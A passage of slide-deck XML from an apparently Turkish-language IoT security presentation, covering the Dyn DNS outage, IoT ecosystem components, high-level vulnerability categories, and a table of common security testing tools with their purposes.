              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Bu saldırılar sonucunda:</a:t>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Dyn DNS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> adlı alan adı hizmet sağlayıcısı hedef alındı.</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Dyn hizmet veremeyince, </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Twitter, Netflix, Reddit, GitHub, Spotify</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> gibi birçok popüler servis </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>saatlerce erişilemez</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> hale geldi.</a:t>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="152" name="Google Shape;152;p20"/>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1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="638075" y="462375"/>
            <a:ext cx="6092400" cy="1936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 sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>🔍 2. IoT Ekosisteminin Bileşenleri</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Cihaz (sensor, aktivatör)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Firmware &amp; işletim sistemleri (RTOS, Linux tabanlı)</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Mobil Uygulama *</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Bulut servisi / API katmanı *</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Ağa bağlı ağ geçitleri (gateways)</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Not:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Her bileşen ayrı bir saldırı vektörü oluşturur.</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="158" name="Google Shape;158;p21"/>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2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="332900" y="443875"/>
            <a:ext cx="6527100" cy="256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 sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>🛡️ 3. IoT Güvenlik Zafiyet Türleri</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 </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>İletişim Güvenliği:</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TLS eksikliği, açık portlar, MQTT zafiyetleri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a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Kimlik Doğrulama / Yetkilendirme:</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JWT (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Json</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Web Token) reuse *, token sızıntısı *, hardcoded credentials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a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Firmware Seviyesi Zafiyetler:</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Telnet açık, OTA update koruması yok, debug arayüzler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a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Uygulama Seviyesi:</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Mobile App reverse engineering → API key extraction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 </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>API &amp; Cloud:</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Improper access control (CWE-284) vb., IDOR, exposed S3 buckets</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="164" name="Google Shape;164;p22"/>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graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="169" name="Google Shape;169;p23"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="661000" y="485325"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{0C7ED1EB-2574-499A-8F1B-8AD002A6164D}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2011625"/>
                <a:gridCol w="2911525"/>
              </a:tblGrid>
              <a:tr h="370225">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1100"/>
                        <a:t>Araç</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1100"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1100"/>
                        <a:t>Amacı</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1100"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
              </a:tr>
              <a:tr h="672500">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1100"/>
                        <a:t>IoT Inspector</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1100"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en"/>
                        <a:t>Cihaz davranışı analiz</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
              </a:tr>
              <a:tr h="672500">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1100"/>
                        <a:t>Binwalk</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1100"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en"/>
                        <a:t>Firmware unpacking</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
              </a:tr>
              <a:tr h="672500">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1100"/>
                        <a:t>Shodan/Censys</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1100"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en"/>
                        <a:t>Cihaz keşfi ve fingerprint</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
              </a:tr>
              <a:tr h="672500">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1100"/>
                        <a:t>Firmwalker</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1100"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en"/>
                        <a:t>Embedded Linux analiz</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
              </a:tr>
              <a:tr h="672500">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1100"/>
                        <a:t>MobSF, Frida</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1100"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en"/>
                        <a:t>Mobil uygulama testi</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
              </a:tr>
              <a:tr h="672500">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1100"/>
                        <a:t>Ghidra/Radare2</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1100"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en"/>
                        <a:t>Reverse engineering</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="170" name="Google Shape;170;p23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5584150" y="924400"/>
            <a:ext cx="3000000" cy="300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800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700"/>
              <a:t>🛠️ 5. IoT Güvenlik Testi Araçları</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="171" name="Google Shape;171;p23"/>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